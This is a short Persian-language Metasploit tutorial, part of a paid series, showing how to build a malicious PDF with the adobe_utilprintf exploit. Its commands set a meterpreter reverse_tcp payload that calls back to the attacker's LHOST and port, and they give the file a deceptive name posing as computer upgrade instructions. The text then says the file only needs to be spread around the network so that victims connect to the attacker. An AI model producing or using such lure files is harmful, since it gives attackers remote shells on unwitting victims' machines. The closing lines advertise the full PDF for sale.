سلام دوستان . قسمت پنجم از آموزش های متااسپلویت را در پیش رو داریم . در این قسمت در مورد client side exploit صحبت خواهیم کرد و نحوه ی ساخت یک pdf آلوده را بررسی خواهیم کرد . هم چنین در ادامه نحوه دسترسی گرفتن و کار ها و اقدامات بعد از دسترسی گرفتن را هم بررسی می کنیم .
برای این منظور از اکسپلویت adobe_utilprintf به شکل زیر استفاده خواهیم کرد :
msf > use exploit/windows/fileformat/adobe_utilprintf
همانند دفعات گذشته از دستور زیر جهت دیدن قابلیت های این اکسپلویت استفاده خواهیم کرد :
msf exploit(adobe_utilprintf) > show options
در مرحله ی بعد یک نام برای فایل pdf خودمون انتخاب می کنیم :
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
حال payload مورد نظر خودمون را انتخاب می کنیم :
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
و در نهایت آدرس آی دی سیستم خودمون :
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
می توان پورتی را به صورت خاص مشخص کرد و از آن استفاده کرد اما به صورت پیش فرض از پورت 4444 استفاده خواهد شد . پس برای تعیین پورت به شکل زیر عمل می کنیم :
msf exploit(adobe_utilprintf) > set LPORT 4455
حال برای ساخت این فایل pdf کافیست عبارت exploit را تایپ و اجرا کنیم :
msf exploit(adobe_utilprintf) > exploit
نکته : فایل pdf ای که ساختیم در مسیر زیر ساخته شده است :
/root/.msf4/local/BestComputers-UpgradeInstructions.pdf
فایل مورد نظر ساخته شد ! حالا کافیست این فایل به هر روشی در سطح شبکه منتشر شود تا قربانی ها به سیستم ما متصل شوند …
ادامه ی مقاله در فایل PDF ( نسخه ی کامل )
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N
قیمت : 1,500 تومان
برای دریافت فایل PDF به مبلغ 1,500 تومان کافیست بر روی خرید کلیک کرده تا به درگاه پارس پال هدایت شوید .
پس از پرداخت لینک دانلود فایل PDF تا دو روز برای شما فعال شده و ایمیلی با همین مضمون نیز برایتان ارسال می شود .
تاییده ی درگاه پارس پال در بالای صفحه سمت چپ قابل مشاهده و احراز هویت است .